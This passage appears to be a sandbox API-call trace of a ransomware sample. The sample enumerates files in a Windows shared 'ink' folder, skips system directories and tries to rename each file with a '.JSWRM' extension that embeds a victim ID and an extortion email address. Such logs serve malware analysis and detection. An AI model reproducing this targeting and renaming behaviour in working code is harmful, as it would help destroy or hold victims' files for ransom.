cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.350] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.350] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.350] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9659828127552840) returned 0 [0068.350] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.350] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.350] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.350] CloseHandle (hObject=0xffffffff) returned 1 [0068.350] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0068.350] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.350] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.350] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.350] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.350] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.350] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0068.350] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0068.350] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.350] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0068.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.351] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0068.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0068.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.351] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e38953f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e38953f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e38953f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x58400, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="InkDiv.dll", cAlternateFileName="")) returned 1 [0068.351] lstrcmpiW (lpString1="InkDiv.dll", lpString2=".") returned 1 [0068.351] lstrcmpiW (lpString1="InkDiv.dll", lpString2="..") returned 1 [0068.351] lstrcmpiW (lpString1="InkDiv.dll", lpString2="...") returned 1 [0068.351] lstrcmpiW (lpString1="InkDiv.dll", lpString2="windows") returned -1 [0068.351] lstrcmpiW (lpString1="InkDiv.dll", lpString2="recovery") returned -1 [0068.351] lstrcmpiW (lpString1="InkDiv.dll", lpString2="perflogs") returned -1 [0068.351] lstrcmpiW (lpString1="InkDiv.dll", lpString2="documents and settings") returned 1 [0068.351] lstrcmpiW (lpString1="InkDiv.dll", lpString2="$RECYCLE.BIN") returned 1 [0068.351] lstrcmpiW (lpString1="InkDiv.dll", lpString2="system volume information") returned -1 [0068.351] lstrcmpiW (lpString1="InkDiv.dll", lpString2="msocache") returned -1 [0068.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0068.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="InkDiv.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="InkDiv.dll", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InkDiv.dll", lpUsedDefaultChar=0x0) returned 10 [0068.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0068.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0068.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="InkDiv.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="InkDiv.dll", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InkDiv.dll", lpUsedDefaultChar=0x0) returned 10 [0068.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0068.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225190 | out: hHeap=0x1e0000) returned 1 [0068.351] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e38953f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e38953f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e38953f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1ecc00, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="InkObj.dll", cAlternateFileName="")) returned 1 [0068.351] lstrcmpiW (lpString1="InkObj.dll", lpString2=".") returned 1 [0068.352] lstrcmpiW (lpString1="InkObj.dll", lpString2="..") returned 1 [0068.352] lstrcmpiW (lpString1="InkObj.dll", lpString2="...") returned 1 [0068.352] lstrcmpiW (lpString1="InkObj.dll", lpString2="windows") returned -1 [0068.352] lstrcmpiW (lpString1="InkObj.dll", lpString2="recovery") returned -1 [0068.352] lstrcmpiW (lpString1="InkObj.dll", lpString2="perflogs") returned -1 [0068.352] lstrcmpiW (lpString1="InkObj.dll", lpString2="documents and settings") returned 1 [0068.352] lstrcmpiW (lpString1="InkObj.dll", lpString2="$RECYCLE.BIN") returned 1 [0068.352] lstrcmpiW (lpString1="InkObj.dll", lpString2="system volume information") returned -1 [0068.352] lstrcmpiW (lpString1="InkObj.dll", lpString2="msocache") returned -1 [0068.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0068.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="InkObj.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="InkObj.dll", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InkObj.dll", lpUsedDefaultChar=0x0) returned 10 [0068.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0068.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0068.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="InkObj.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="InkObj.dll", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InkObj.dll", lpUsedDefaultChar=0x0) returned 10 [0068.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0068.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0068.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.352] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d14d081, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe467a929, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe467a929, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x59a00, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="InputPersonalization.exe", cAlternateFileName="")) returned 1 [0068.352] lstrcmpiW (lpString1="InputPersonalization.exe", lpString2=".") returned 1 [0068.352] lstrcmpiW (lpString1="InputPersonalization.exe", lpString2="..") returned 1 [0068.352] lstrcmpiW (lpString1="InputPersonalization.exe", lpString2="...") returned 1 [0068.352] lstrcmpiW (lpString1="InputPersonalization.exe", lpString2="windows") returned -1 [0068.352] lstrcmpiW (lpString1="InputPersonalization.exe", lpString2="recovery") returned -1 [0068.352] lstrcmpiW (lpString1="InputPersonalization.exe", lpString2="perflogs") returned -1 [0068.352] lstrcmpiW (lpString1="InputPersonalization.exe", lpString2="documents and settings") returned 1 [0068.352] lstrcmpiW (lpString1="InputPersonalization.exe", lpString2="$RECYCLE.BIN") returned 1 [0068.352] lstrcmpiW (lpString1="InputPersonalization.exe", lpString2="system volume information") returned -1 [0068.352] lstrcmpiW (lpString1="InputPersonalization.exe", lpString2="msocache") returned -1 [0068.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0068.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="InputPersonalization.exe", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0068.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0068.353] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="InputPersonalization.exe", cchWideChar=24, lpMultiByteStr=0x2412e0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InputPersonalization.exe", lpUsedDefaultChar=0x0) returned 24 [0068.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0068.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0068.353] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="InputPersonalization.exe", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0068.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0068.353] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="InputPersonalization.exe", cchWideChar=24, lpMultiByteStr=0x241290, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InputPersonalization.exe", lpUsedDefaultChar=0x0) returned 24 [0068.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0068.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0068.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0068.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0068.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0068.353] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d126e12, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x972, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ipsar.xml", cAlternateFileName="")) returned 1 [0068.353] lstrcmpiW (lpString1="ipsar.xml", lpString2=".") returned 1 [0068.353] lstrcmpiW (lpString1="ipsar.xml", lpString2="..") returned 1 [0068.353] lstrcmpiW (lpString1="ipsar.xml", lpString2="...") returned 1 [0068.353] lstrcmpiW (lpString1="ipsar.xml", lpString2="windows") returned -1 [0068.353] lstrcmpiW (lpString1="ipsar.xml", lpString2="recovery") returned -1 [0068.353] lstrcmpiW (lpString1="ipsar.xml", lpString2="perflogs") returned -1 [0068.353] lstrcmpiW (lpString1="ipsar.xml", lpString2="documents and settings") returned 1 [0068.353] lstrcmpiW (lpString1="ipsar.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.353] lstrcmpiW (lpString1="ipsar.xml", lpString2="system volume information") returned -1 [0068.353] lstrcmpiW (lpString1="ipsar.xml", lpString2="msocache") returned -1 [0068.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0068.353] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsar.xml", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0068.353] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsar.xml", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsar.xml", lpUsedDefaultChar=0x0) returned 9 [0068.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0068.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.353] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsar.xml", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0068.353] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipsar.xml", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsar.xml", lpUsedDefaultChar=0x0) returned 9 [0068.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0068.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0068.353] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.353] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.354] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsar.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.411] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9659828127552840) returned 0 [0068.411] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.411] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.411] CloseHandle (hObject=0xffffffff) returned 1 [0068.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0068.411] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.411] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.411] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0068.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0068.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.412] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsar.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsar.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0068.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.412] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d126e12, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa20, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ipscat.xml", cAlternateFileName="")) returned 1 [0068.412] lstrcmpiW (lpString1="ipscat.xml", lpString2=".") returned 1 [0068.412] lstrcmpiW (lpString1="ipscat.xml", lpString2="..") returned 1 [0068.412] lstrcmpiW (lpString1="ipscat.xml", lpString2="...") returned 1 [0068.412] lstrcmpiW (lpString1="ipscat.xml", lpString2="windows") returned -1 [0068.412] lstrcmpiW (lpString1="ipscat.xml", lpString2="recovery") returned -1 [0068.412] lstrcmpiW (lpString1="ipscat.xml", lpString2="perflogs") returned -1 [0068.412] lstrcmpiW (lpString1="ipscat.xml", lpString2="documents and settings") returned 1 [0068.412] lstrcmpiW (lpString1="ipscat.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.412] lstrcmpiW (lpString1="ipscat.xml", lpString2="system volume information") returned -1 [0068.412] lstrcmpiW (lpString1="ipscat.xml", lpString2="msocache") returned -1 [0068.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0068.412] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipscat.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.412] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipscat.xml", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipscat.xml", lpUsedDefaultChar=0x0) returned 10 [0068.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0068.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipscat.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipscat.xml", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipscat.xml", lpUsedDefaultChar=0x0) returned 10 [0068.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0068.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225190 | out: hHeap=0x1e0000) returned 1 [0068.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0068.413] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.413] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9661580474208384) returned 0 [0068.413] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.413] ReadFile (in: hFile=0xffffffff, 